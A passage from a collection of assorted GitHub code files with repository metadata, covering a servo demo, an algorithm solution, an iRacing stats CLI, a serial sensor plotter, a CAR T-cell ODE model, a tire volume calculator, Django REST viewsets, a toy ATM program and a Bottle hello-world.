= int( direction )\n        self.servo = GPIO.PWM( self.pin, 50 )\n        self.servo.start(0.0)\n\n    def cleanup( self ):\n        self.servo.ChangeDutyCycle(self._henkan(0))\n        time.sleep(0.3)\n        self.servo.stop()\n        GPIO.cleanup()\n\n    def currentdirection( self ):\n        return self.direction\n\n    def _henkan( self, value ):\n        return 0.05 * value + 7.0\n\n    def setdirection( self, direction, speed ):\n        for d in range( self.direction, direction, int(speed) ):\n            self.servo.ChangeDutyCycle( self._henkan( d ) )\n            self.direction = d\n            time.sleep(0.1)\n        self.servo.ChangeDutyCycle( self._henkan( direction ) )\n        self.direction = direction\n\n\ndef moveServo():\n    servo_pin = 19\n    s = Servo(servo_pin,0)\n    for i in range(14):\n        print(\"Turning left...\")\n        s.setdirection( 100, 80 )\n        #10\n        time.sleep(1)\n        print(\"Turning right...\")\n        s.setdirection( -100, -80 )\n        time.sleep(1)\n    s.cleanup()\n\ndef main():\n    moveServo()\n\n\ntry:\n    servo_pin = 19\n    s = Servo(servo_pin,0)\n    for i in range(14):\n        print(\"Turning left...\")\n        s.setdirection( 100, 80 )\n        #10\n        time.sleep(1)\n        print(\"Turning right...\")\n        s.setdirection( -100, -80 )\n        time.sleep(1)\n    s.cleanup()\n\nexcept KeyboardInterrupt:\n    s.cleanup()\n","repo_name":"gimfo/gimpublic","sub_path":"src_joy_py_prj/04_Servo_demo/Servo_wave.py","file_name":"Servo_wave.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"15222732500","text":"import itertools\n\nmod = 10007\nn = int(input())\nfactorial = [1]\ntemp = 1\nfor i in range(1,n+1):\n    temp *= i\n    factorial.append(temp)\nplus_square2m1 = n%2\ncase = 0\ncomb = itertools.combinations(range(n//2+2),2)\nfor idx in comb:\n    square2m1 = 2*idx[0] + plus_square2m1\n    square1m2 = idx[1] - idx[0] - 1\n    square2m2 = (n//2+2) - idx[1] - 1\n    case += factorial[square2m1+square1m2+square2m2] // factorial[square2m1] // factorial[square1m2] // factorial[square2m2] % mod\nprint(case%mod)","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj11727.py","file_name":"boj11727.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"28010774453","text":"import os\nimport sys\nimport urllib\nimport click\nfrom ir_webstats.client import iRWebStats\n\nirw = iRWebStats()\n\n\n@click.command()\n@click.argument(\"club\")\n@click.argument(\"season\")\n@click.option(\"--top\", default=3, type=int)\n@click.option(\"--user\", prompt=\"Username\")\ndef ir_clubchamp(club, season, top=3, user=None, password=None):\n    '''iRacing Club Champions - find the topX from your club on iRacing official seasons.\n\n    To get all Top10 from Club Brazil:\n\n    > ir_clubchamps Brazil 2014.3 --top=10\n    '''\n    year, quarter = map(int, season.split('.'))\n    if hasattr(sys, \"frozen\"):\n        os.environ[\"REQUESTS_CA_BUNDLE\"] = os.path.join(os.path.dirname(sys.executable), \"cacert.pem\")\n    if os.path.isfile('cookie.tmp'):\n        irw.login()\n    else:\n        password = click.prompt('Password', hide_input=True)\n        irw.login(user, password)\n    if not irw.logged:\n        click.echo(\n            \"Couldn't log in to iRacing Membersite. 
Please check your credentials\")\n    else:\n        champs = acquire_champ_list(club, year, quarter, top)\n        print_champs(champs)\n\n\ndef find_club_id(clubname):\n    for club_id in irw.CLUBS:\n        shortclubname = urllib.parse.unquote(irw.CLUBS[club_id][\"shortclubname\"])\n        if shortclubname == clubname:\n            return irw.CLUBS[club_id][\"id\"]\n    else:\n        raise KeyError(\"Club ID not found for {}\".format(clubname))\n\n\ndef get_seasons(year, quarter):\n    '''\n    Return seasons ID for the given year-quarter\n\n    :param int year:\n    :param int quarter:\n    :rtype: list\n    '''\n    for yearquarter in irw.YEARANDQUARTER:\n        if yearquarter['year'] == year:\n            for quarters in yearquarter['quarters']:\n                if quarters['quarterid'] == quarter:\n                    return quarters['seasons']\n    else:\n        raise KeyError(\"Seasons for {}-{} not found\".format(year, quarter))\n\n\ndef acquire_champ_list(club, year, quarter, tops=3):\n    champs = []\n    club_id = find_club_id(club)\n    seasons2process = irw.all_seasons()\n    if seasons2process is None:\n        sys.exit(\"Exiting (Unable to load Season data)...\")\n    if year:\n        seasons2process = [s for s in seasons2process if s[\"year\"] == year]\n    if quarter:\n        seasons2process = [s for s in seasons2process if s[\"quarter\"] == quarter]\n    with click.progressbar(seasons2process, label=\"Requesting Series Stats\") as seasons:\n        for season in seasons:\n            if not season[\"isOfficial\"]:\n                continue\n            for carclass in season[\"carclasses\"]:\n                class_id = int(carclass[\"id\"])\n                if class_id in [0]:\n                    continue\n#                click.echo(\"Getting results for {} ({})\".format(season[\"seriesshortname\"], season[\"seasonid\"]))\n                try:\n                    resp = irw.season_standings(season[\"seasonid\"], class_id)\n                except Exception as exc:\n#                    click.echo(\"- Error {}\".format(exc))\n                    continue\n                standings = resp[0]\n                for i, driver in enumerate(standings[:tops]):\n                    if driver[\"clubid\"] == club_id:\n                        pos = i+1\n                        champs.append((pos, driver, season, carclass))\n    return champs\n\n\ndef print_champs(champs):\n    seasons = {}\n    for champ in champs:\n        seasonchamps = seasons.setdefault(champ[2][\"seasonshortname\"], [])\n        seasonchamps.append(champ)\n    for season_name in sorted(seasons):\n        click.echo(season_name)\n        seasonchamps = seasons[season_name]\n        for pos, driver, season, carclass in sorted(seasonchamps, key=lambda x: x[0]):\n            driver_name = urllib.parse.unquote(driver[\"displayname\"])\n            driver_name = driver_name.replace(\"+\", \" \")\n            if season[\"multiclass\"]:\n                series_name = \"{} ({})\".format(season[\"seriesname\"], carclass[\"shortname\"])\n            else:\n                series_name = season[\"seriesname\"]\n            if pos == 1:\n                pos_text = \"Champion\"\n            elif pos == 2:\n                pos_text = \"2nd Place\"\n            elif pos == 3:\n                pos_text = \"3rd Place\"\n            else:\n                pos_text = \"{}th Place\".format(pos)\n            click.echo(\"{0:28} {1:9} - {2}\".format(driver_name, pos_text, series_name))\n        click.echo()\n\n\nif __name__ == '__main__':\n    click.echo(\"= iRacing Club Champions =\")\n    click.echo()\n    ir_clubchamp()","repo_name":"igortg/ir_clubchamps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"71101141229","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\nCreated on Mon Oct 29 20:27:42 2018\n\n@author: bird\nDisplay the sensor data waveform in real time.\n\"\"\"\n\nfrom Tkinter import *  # import the Tkinter module\nimport threading\nimport serial\nimport numpy as np\nimport csv\nimport time\nimport string\nimport binascii\nimport os\nimport math\nimport tkMessageBox\nimport matplotlib.pyplot as plt\nfrom 
sklearn import preprocessing\nimport sys, re, fileinput, glob, shutil  # duplicate imports of string/time/math/numpy/pyplot removed\nimport scipy as sp\nimport random\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\nfrom scipy import signal\n\n\nfrom sklearn import tree\nmodel = tree.DecisionTreeRegressor()\nstopClass = []\n\nglobal num,flag,f,f1,f2,f3,flagWriteData,cnum,startSaveStr,bakNameStr, gestureTypeStr, nameStr,z,actflag1,z1,z2,actflag2,actflag3,zz,data\nz = [[0 for i in range(300)] for i in range(4)]\nz1 = [[],[],[],[]]\nz2 = [[],[],[],[]]\nzz = [[],[],[],[]]\nnum = 0\nflag = 1\nflagWriteData = 0\ngestureTypeStr =''\nnameStr =''\nbakNameStr=''\nserial_result = []\nactflag1 = 0\nactflag2 = 1\nactflag3 = 300\nser = serial.Serial(\n    port = 'com11',\n    baudrate=115200,\n)\n\n\n\ncnum = []\n\nisOpened = threading.Event()\n\n#----------------------------------------------------------------------\ndef drawPic():\n    # read the parameters from the GUI\n    global ch,z,actflag1,c1,c2,c3,c4,z1,z2,actflag2,actflag3,zz,mean0,mean1,mean2,mean3\n\n    z= np.array(z)\n    ch=np.array(ch)\n    lens = len(ch[1])\n    z = np.hstack((z[:,lens:],ch))\n    b,a = signal.butter(3,0.15,'low')\n    z2 = signal.filtfilt(b,a,z)\n    # clear the figure so that consecutive plots do not overlap\n    drawPic.f.clf()\n    drawPic.a=drawPic.f.add_subplot(111)\n    drawPic.a.plot(z2[0],'b')\n    drawPic.a.plot(z2[1],'r')\n    drawPic.a.plot(z2[2],'g')\n    drawPic.a.plot(z2[3],'y')\n    drawPic.a.set_title('Demo: Draw N Random Dot')\n    drawPic.canvas.show()\n\n\ndef clear():\n    global cnum,num\n    cnum = []\n    num = 0\n\ndef COMT():\n\n    global num,flag,f,data\n    print(\"trying connect to the serial^^^\")\n    while 1:\n        n = ser.inWaiting()\n        tmpN=n\n        if n:\n            #print n\n            data = ''\n            while n:\n                data += str(binascii.b2a_hex(ser.read(1)))  # [2:-1]\n#                data += ' '\n                n = n - 1\n#            print data\n            if data != '':\n                if flagWriteData == 1:\n                    f.write(data)\n                num = num + tmpN\n#                print num\n\n\ndef DISPLAY(): # use a flag to decide whether the display should be updated\n\n    global data,ch\n    data1 = ''\n\n    flag = 0\n    while 1:\n        if data != '':\n            if data != data1:\n                if flag == 0:\n                    if len(data) < 20:\n                        flag =1\n                if flag == 1:\n                    if len(data) > 120:\n                        ch = [[],[],[],[]]\n                        lens = int(len(data)/16) - 1\n                        for i in range(16):\n                            if((data[i]=='0')&(data[i+4]=='1')&(data[i+8]=='2')&(data[i+12]=='3')):\n                                break\n                        flag =0\n                        datas = data[i:i+16*lens]\n                        for j in range(lens):\n                            for chnum in range(4):\n                                amplitude = int(datas[j*16+chnum*4+1],16)*256+int(datas[j*16+chnum*4+2],16)*16+int(datas[j*16+chnum*4+3],16)\n                                ch[chnum].append(amplitude)\n                        drawPic()\n                data1 = data\n\n# the config method changes a widget by setting its options, e.g. the font size\ntop=Tk() # main window\ntop.geometry('600x400') # set the main window's initial size to 600x400\nframe = Frame(top)\nu = StringVar()\ntop.title('Ubicom Gesture Data Collection ')\nnameLabel=Label(top,text='Name:')\nnameLabel.grid(row=0,sticky=E)\nnameEntry=Entry(top)\nnameEntry.grid(row=0,column=1)\nnameEntry.insert(0,'zyf')\ngestureTypeLabel=Label(top,text='Gesture type:')\ngestureTypeLabel.grid(row=1,column=0,sticky=E)\nresultTypeLabel=Label(top,text='result:')\nresultTypeLabel.grid(row=5,column=0,sticky=E)\nresultTypeEntry=Entry(top)\nresultTypeEntry.grid(row=5,column=1)\nresultTypeEntry.insert(0,'???')\ngestureTypeEntry=Entry(top)\ngestureTypeEntry.grid(row=1,column=1)\ngestureTypeEntry.insert(0,'1')\ncountLabel=Label(top,text='Please enter the collector name and gesture number')\ncountLabel.grid(row=0,column=2,columnspan=4,rowspan=2, sticky=E, padx=5, pady=5)\n\nstartSaveStr=StringVar()\nstartSaveButton=Button(top,textvariable=startSaveStr, width=15,command = 
startSaveCB)\nstartSaveButton.grid(row=2,column=2,rowspan=2)\nstartSaveStr.set('Start')\n\n# place a canvas on the Tk GUI and use .grid() to arrange the layout\ndrawPic.f = Figure(figsize=(5,4), dpi=100)\ndrawPic.canvas = FigureCanvasTkAgg(drawPic.f, master=top)\ndrawPic.canvas.show()\ndrawPic.canvas.get_tk_widget().grid(row=11, columnspan=3)\n\ncom_thread = threading.Thread(target=COMT)\ncom_thread.setDaemon(True)\ncom_thread.start()\n\n\ndisplay_thread = threading.Thread(target=DISPLAY)\ndisplay_thread.setDaemon(True)\ndisplay_thread.start()\nmainloop()\n","repo_name":"zyf001/wristmouse_code","sub_path":"serial_show.py","file_name":"serial_show.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"17710148599","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 11 10:47:10 2022\r\n\r\n@author: cdmeh\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 18 16:44:22 2022\r\n\r\n@author: cdmeh\r\n\"\"\"\r\n\r\n# Imports necessary modules\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.integrate as scint\r\n\r\n# Plots a series of comparison curves between CARRGO and\r\n# the new Bertalanffy model.\r\ndef main():\r\n    \r\n    x1,y1,z1,m1,n1 = NEWGO([0,0,0],[0.5,0,0,0.5,0])\r\n    x2,y2,z2,m2,n2 = NEWGO([0,0,0],[0.5,0.5,0,0.5,0])\r\n    x3,y3,z3,m3,n3 = NEWGO([0.25,0.25,0.25],[0.5,0.5,0,0.5,0])\r\n    t = np.linspace(0,40,len(x1))\r\n    label1 = [\"New Model: No Dose\",\"New Model: One Dose\",\"New Model: Four Doses\"]\r\n    plt.figure(1)\r\n    plt.grid(True)\r\n    plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n    plt.ylabel(\"Cancer Cell Count\")\r\n    plt.xlabel(\"Time Elapsed\")\r\n    plt.plot(t,x1, label = label1[0])\r\n    plt.plot(np.linspace(0,40,len(x2)),x2, label = label1[1])\r\n    plt.plot(np.linspace(0,40,len(x3)),x3, label = label1[2])\r\n    plt.legend()\r\n    plt.show()\r\n    plt.close(fig = 1)\r\n    plt.figure(2)\r\n    plt.grid(True)\r\n    plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n    plt.ylabel(\"CAR T-Cell Count\")\r\n    plt.xlabel(\"Time Elapsed\")\r\n    plt.plot(t,y1, label = label1[0])\r\n    plt.plot(np.linspace(0,40,len(y2)),y2, label = label1[1])\r\n    plt.plot(np.linspace(0,40,len(y3)),y3, label = label1[2])\r\n    plt.legend()\r\n    plt.show()\r\n    plt.close(fig = 2)\r\n    plt.figure(3)\r\n    plt.grid(True)\r\n    plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n    plt.ylabel(\"Memory T-Cell Count\")\r\n    plt.xlabel(\"Time Elapsed\")\r\n    plt.plot(t,z1, label = label1[0])\r\n    plt.plot(np.linspace(0,40,len(z2)),z2, label = label1[1])\r\n    plt.plot(np.linspace(0,40,len(z3)),z3, label = label1[2])\r\n    plt.legend()\r\n    plt.show()\r\n    plt.close(fig = 3)\r\n    plt.figure(4)\r\n    plt.grid(True)\r\n    plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n    plt.ylabel(\"Non-Tumor Associated Macrophage Cell Count\")\r\n    plt.xlabel(\"Time Elapsed\")\r\n    plt.plot(t,m1, label = label1[0])\r\n    plt.plot(np.linspace(0,40,len(m2)),m2, label = label1[1])\r\n    plt.plot(np.linspace(0,40,len(m3)),m3, label = label1[2])\r\n    plt.legend()\r\n    plt.show()\r\n    plt.close(fig = 4)\r\n    plt.figure(5)\r\n    plt.grid(True)\r\n    plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n    plt.ylabel(\"Tumor Associated Macrophage Cell Count\")\r\n    plt.xlabel(\"Time Elapsed\")\r\n    plt.plot(t,n1, label = label1[0])\r\n    plt.plot(np.linspace(0,40,len(n2)),n2, label = label1[1])\r\n    plt.plot(np.linspace(0,40,len(n3)),n3, label = label1[2])\r\n    plt.legend()\r\n    plt.show()\r\n    
plt.close(fig = 5)\r\n \r\n \r\n \r\n\r\ndef NEWGO(DOSE,z0):\r\n # Parameters of the simulation\r\n # Final Time\r\n tf = 40\r\n # Number of steps\r\n n = 1000\r\n tspan = (0,tf)\r\n # System parameters\r\n P = (1.87,1.6,1,1,1,1,1,1,1,1,2,3,2)\r\n \r\n \r\n sol1 = scint.solve_ivp(dw,(0,tf//4),z0, args = P,max_step = tspan[-1]/n)\r\n z1 = [sol1.y[0][-1],sol1.y[1][-1]+DOSE[0],sol1.y[2][-1],sol1.y[3][-1],sol1.y[4][-1]]\r\n sol2 = scint.solve_ivp(dw,(0,tf//4),z1, args = P,max_step = tspan[-1]/n)\r\n z2 = [sol2.y[0][-1],sol2.y[1][-1]+DOSE[1],sol2.y[2][-1],sol2.y[3][-1],sol2.y[4][-1]]\r\n sol3 = scint.solve_ivp(dw,(0,tf//4),z2, args = P,max_step = tspan[-1]/n)\r\n z3 = [sol3.y[0][-1],sol3.y[1][-1]+DOSE[2],sol3.y[2][-1],sol3.y[3][-1],sol3.y[4][-1]]\r\n sol4= scint.solve_ivp(dw,(0,tf//4),z3, args = P,max_step = tspan[-1]/n)\r\n sx = np.hstack((sol1.y[0],sol2.y[0],sol3.y[0],sol4.y[0]))\r\n sy = np.hstack((sol1.y[1],sol2.y[1],sol3.y[1],sol4.y[1]))\r\n sz = np.hstack((sol1.y[2],sol2.y[2],sol3.y[2],sol4.y[2]))\r\n sm = np.hstack((sol1.y[3],sol2.y[3],sol3.y[3],sol4.y[3]))\r\n sn = np.hstack((sol1.y[4],sol2.y[4],sol3.y[4],sol4.y[4]))\r\n # Plots trajectories and boundary between regions of concavity\r\n \r\n return sx,sy,sz,sm,sn\r\ndef dw(t,z,A,B,C,D,E,G,H,I,J,K,L,M,N):\r\n F = np.power(A/B,1/3)\r\n dx = A*np.power(z[0],2/3) - B*z[0] - (C+D*z[3])*z[1]*np.power(z[0],2/3)\r\n dy = -1*E*(1 - np.power(z[0],2/3)/F)*z[1] + G*z[2]*np.power(z[0],2/3) + H*z[1]*np.power(z[0],2/3) - I*z[1]\r\n dz = E*(1 - np.power(z[0],2/3)/F)*z[1] - G*z[2]*np.power(z[0],2/3) - J*z[2]\r\n dm = (L - K)*z[3]*np.power(z[0],2/3) + M*z[3]*z[4] - N*z[3]\r\n dn = K*z[3]*np.power(z[0],2/3) - M*z[3]*z[4] - N*z[4]\r\n return [dx,dy,dz,dm,dn]\r\n\r\n# Executes function\r\nmain()","repo_name":"CMeherg/CARRGO","sub_path":"meherg_CARR_3-11-2022.py","file_name":"meherg_CARR_3-11-2022.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21980442901","text":"import math\nfrom datetime import datetime\n\nwidth = float( input( \"Enter the width of the tire in mm (ex 205): \" ) )\nratio = float( input( \"Enter the aspect ratio of the tire (ex 60): \" ) )\ndiameter = float( input( \"Enter the diameter of the wheel in inches (ex 15): \" ) )\n\nvolume = ((math.pi * (width ** 2.0) * ratio) * ((width * ratio) + (2540.0 * diameter)))/(10000000.0)\nounces = volume / 29.574\n\nprint(f\"The approximate volume is {volume:.1f} milliliters ({ounces:.1f} ounces)\")\n\npurchase = input(\"Would you like to purchase tires with these dimensions(Yes or No)? 
\")\n\nif purchase.lower() == \"yes\":\n phone = input(\"Please enter your phone number so we can help complete your purchase: \")\n\n current = str(datetime.now())\n split = current.split(\" \", 1)\n date = split[0]\n\n with open(\"volumes.txt\", \"at\") as volumes_file:\n\n # Print a car's model and dimensions to the file.\n print(f\"{date}, {int(width)}, {int(ratio)}, {int(diameter)}, {volume:.1f}, {phone}\", file=volumes_file)\n\nelif purchase.lower() == \"no\":\n current = str(datetime.now())\n split = current.split(\" \", 1)\n date = split[0]\n\n with open(\"volumes.txt\", \"at\") as volumes_file:\n\n # Print a car's model and dimensions to the file.\n print(f\"{date}, {int(width)}, {int(ratio)}, {int(diameter)}, {volume:.1f}\", file=volumes_file)","repo_name":"EmeraldE11/ProgrammingWithFunctions","sub_path":"tire_volume.py","file_name":"tire_volume.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7504135171","text":"from django.db.models.query import QuerySet\nfrom django.shortcuts import get_object_or_404, render\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import filters, viewsets\nfrom rest_framework import permissions\nfrom rest_framework import status\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom .models import Bid, Category, Listing, Comment, UserUploadedImage, Watching\nfrom .serializers import BidSerializer, CategorySerializer, ListingSerializer, CommentSerializer, WatchingSerializer, UserUploadedImageSerializer\nfrom .permissions import IsOwnerOrReadOnly, IsOwner\nfrom .custom_helpers import get_object_or_None\nfrom users.models import User\nfrom rest_framework import status\nfrom commerce_rest.settings import MEDIA_ROOT\nimport django_filters.rest_framework\n# Create your views here.\n\n\nclass ListingViewSet(viewsets.ModelViewSet):\n queryset = Listing.objects.order_by('-creation_date')\n search_fields = ['title', 'description', 'category__name']\n # filter_backends = (filters.SearchFilter,)\n filter_backends = [filters.SearchFilter,\n django_filters.rest_framework.DjangoFilterBackend]\n filterset_fields = ['category', 'is_active']\n serializer_class = ListingSerializer\n parser_classes = (MultiPartParser, FormParser)\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n # Debug Perform_create only\n # def perform_create(self, serializer):\n # serializer.save(creator=User.objects.get(pk=1))\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\n# TODO add an admin or read only class\nclass CategoryViewSet(viewsets.ModelViewSet):\n queryset = Category.objects.order_by('name')\n serializer_class = CategorySerializer\n permission_classes = [permissions.DjangoModelPermissionsOrAnonReadOnly]\n pagination_class = None\n\n\nclass BidViewSet(viewsets.ModelViewSet):\n queryset = Bid.objects.all()\n serializer_class = BidSerializer\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n\nclass 
UserImagesViewSet(viewsets.ModelViewSet):\n    queryset = UserUploadedImage.objects.all()\n    serializer_class = UserUploadedImageSerializer\n    permission_classes = [\n        permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n    permission_classes = [\n        permissions.AllowAny]\n\n    def perform_create(self, serializer):\n        serializer.save(creator=self.request.user)\n\n\nclass WatchingViewSet(viewsets.ModelViewSet):\n    queryset = Watching.objects.all()\n    serializer_class = WatchingSerializer\n    permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n\n    def create(self, request):\n        user = request.user\n        try:\n            listing = Listing(id=request.data['listing_id'])\n            instance = Watching(user_id=user, listing_id=listing)\n        except Exception:\n            return Response({\"message\": \"Something went wrong. Check that user and listing exist\"}, status=status.HTTP_400_BAD_REQUEST)\n\n        watching_listing = get_object_or_None(\n            Watching.objects.all(), user_id=request.user.id, listing_id=request.data['listing_id'])\n        if watching_listing is None:\n            serializer = WatchingSerializer(\n                instance=instance, data=request.data)\n            if serializer.is_valid():\n                watching_saved = serializer.save()\n                return Response({\"message\": f\"{watching_saved.listing_id.id} added to watch list\"}, status=status.HTTP_201_CREATED)\n            return Response({\"message\": \"Something went wrong\"}, status=status.HTTP_400_BAD_REQUEST)\n\n        # TODO refactor into destroy()\n        watching_listing.delete()\n\n        return Response({\"message\": f\"{watching_listing.listing_id} removed from watch list\"}, status=status.HTTP_200_OK)\n\n    # def destroy(self, request):\n    #     user_id = request.user.id\n    #     print(request.user)\n    #     # listing = Listing(id=request.data['listing_id'])\n    #     watching_listing = get_object_or_None(\n    #         Watching.objects.all(), user_id=user_id, listing_id=request.data['listing_id'])\n\n    #     if watching_listing is None:\n    #         return Response({\"message\": f\"User is already not currently watching {watching_listing.listing_id}\"}, status=status.HTTP_400_BAD_REQUEST)\n\n    #     watching_listing.delete()\n    #     return Response({\"message\": f\"{watching_listing.listing_id} removed from watch list\"}, status=status.HTTP_200_OK)\n","repo_name":"IB21-A/ebid","sub_path":"commerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22829737673","text":"class Usuario:\r\n    def __init__(self):\r\n        self.nombre=[]\r\n        self.cedula=[]\r\n        self.numero=[]\r\n        self.clave=[]\r\n        print( '''  \r\n            WE ARE NEQUI COLOMBIA \r\n            WELCOME!!\r\n            to start enjoying nequi \r\n            you must register''')\r\n    def crearUsuario(self):\r\n        self.opcionUsuario = int(input('''\r\n        ------------------------------------------\r\n        PLEASE enter the following details in order.. \r\n        1. My name\r\n        2. My ID number\r\n        3. My phone number\r\n        4. My password\r\n        5. View my user \r\n        6. finish registration\r\n        enter: '''))\r\n        while True:\r\n            if self.opcionUsuario==1:\r\n                self.nombreDef()\r\n            elif self.opcionUsuario==2:\r\n                self.cedulaDef()\r\n            elif self.opcionUsuario==3:\r\n                self.telefonoDef()\r\n            elif self.opcionUsuario==4:\r\n                self.claveDef()\r\n            elif self.opcionUsuario==5:\r\n                self.mostrarUsuario()\r\n            elif self.opcionUsuario>=6:\r\n                break\r\n            else:\r\n                print('SORRY, INVALID OPTION! TRY AGAIN.. ')\r\n                self.crearUsuario()\r\n\r\n    def nombreDef(self):\r\n        self.nombre.append(input(\"enter your name: \"))\r\n        self.nnombre=self.nombre\r\n        print(self.nombre)\r\n        print('''continue with your registration\r\n        please enter your ID number: ''')\r\n        self.crearUsuario()\r\n\r\n    def cedulaDef(self):\r\n        self.cedula.append(int(input(\"enter your ID number: \")))\r\n        self.ccedula=self.cedula\r\n        print(self.nombre)\r\n        print('''continue with your registration\r\n        please enter your contact number: ''')\r\n        self.crearUsuario()\r\n\r\n    def telefonoDef(self):\r\n        self.numero.append(int(input(\"please enter your contact number: \")))\r\n        self.nnumero=self.numero\r\n        print(self.nombre)\r\n        print('''continue with your registration\r\n        please enter your user password:''')\r\n        self.crearUsuario()\r\n\r\n    def claveDef(self):\r\n        self.clave.append(int(input(\"enter a password for your user: \")))\r\n        self.cclave=self.clave\r\n        self.crearUsuario()\r\n\r\n    def mostrarUsuario (self):\r\n        print(\"\\tyour user name is: \",self.nnombre)\r\n        print(\"\\tyour ID number is: \",self.ccedula)\r\n        print(\"\\tyour contact phone is: \",self.nnumero)\r\n        print(\"\\tyour user password is: \",self.cclave)\r\n        print('=======================================')\r\n        print('THANK YOU FOR USING OUR SERVICES!')\r\n        print('=======================================')\r\n        self.crearUsuario()\r\n\r\n\r\nclass login(Usuario):\r\n    def inter(self):\r\n        print('''\r\n        WELCOME\r\n        ''')\r\n        self.xxnombre=self.nombre.index(str(input(\"enter your user name: \")))\r\n        self.xnombre=self.nombre[self.xxnombre] \r\n        print (self.xnombre)\r\n\r\n        self.xxclave=int(input(\"enter your password\"))\r\n        if self.clave[self.xxnombre]==self.xxclave:  # the entered password must match the one stored for this user\r\n            print('''\r\n            WELCOME\r\n            \r\n            you can now enjoy nequi colombia''')\r\n        else:\r\n            print(\"try again\")\r\n            self.inter()\r\nclass Cajero(login):\r\n    monto=0\r\n    def operaciones(self):\r\n        self.opcion = int(input('''\r\n        ------------------------------------------\r\n        PLEASE INDICATE WHICH OPERATION YOU WANT TO PERFORM.. \r\n        1. VIEW BALANCE\r\n        2. DEPOSIT TO ACCOUNT\r\n        3. CASH WITHDRAWAL\r\n        4. EXIT\r\n        5. SHOW_USER\r\n        enter: '''))\r\n        self.control=0\r\n        while self.control==0:\r\n            if self.opcion==1:\r\n                self.saldo()\r\n            elif self.opcion==2:\r\n                self.depositar()\r\n            elif self.opcion==3:\r\n                self.retirar()\r\n            elif self.opcion==4:\r\n                self.control=1\r\n                self.salir()\r\n            else:\r\n                print('SORRY, INVALID OPTION! TRY AGAIN.. ')\r\n                self.operaciones()\r\n\r\n    def saldo(self):\r\n        print('YOUR AVAILABLE BALANCE IS: ', self.monto)\r\n        print('DO YOU WANT TO PERFORM ANOTHER OPERATION?')\r\n        self.operaciones()\r\n\r\n    def depositar(self):\r\n        self.deposito = int(input('ENTER THE AMOUNT TO DEPOSIT.. '))\r\n        self.monto=self.monto + self.deposito\r\n        self.saldo()\r\n\r\n    def retirar(self):\r\n        self.retiro = int(input('ENTER THE AMOUNT TO WITHDRAW.. '))\r\n        self.control = 0\r\n        while self.control==0:\r\n            if self.retiro > self.monto:\r\n                print('''THERE ARE NOT ENOUGH FUNDS!!!..\r\n                --------------------------------------------''')\r\n                self.retiro = int(input('ENTER THE AMOUNT TO WITHDRAW.. '))\r\n            elif self.retiro<= self.monto:\r\n                self.monto=self.monto-self.retiro\r\n                self.control=1\r\n                print('AMOUNT WITHDRAWN: ', self.retiro)\r\n                self.saldo()\r\n\r\n    def salir(self):\r\n        print('=======================================')\r\n        print('THANK YOU FOR USING OUR SERVICES!')\r\n        print('=======================================')\r\n\r\n\r\nejecucion = Cajero()\r\nejecucion.crearUsuario()\r\nejecucion.inter()\r\nejecucion.operaciones()\r\n","repo_name":"DRAKOrar/mini-nequi","sub_path":"login10.py","file_name":"login10.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72920827308","text":"import bottle\n\n\n@bottle.route('/')\ndef home_page():\n    my_things = ['apple', 'orange', 'banana', 'peach']\n    return bottle.template('hello_world', {'username': 'Pahko',\n                                           'things': my_things})\n\n\nbottle.debug(True)\nbottle.run(host='localhost', port=8080)\n","repo_name":"online-courses/M101P-MongoDB-for-Developers","sub_path":"week-1-4-Bottle-Framework--Using-Views/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
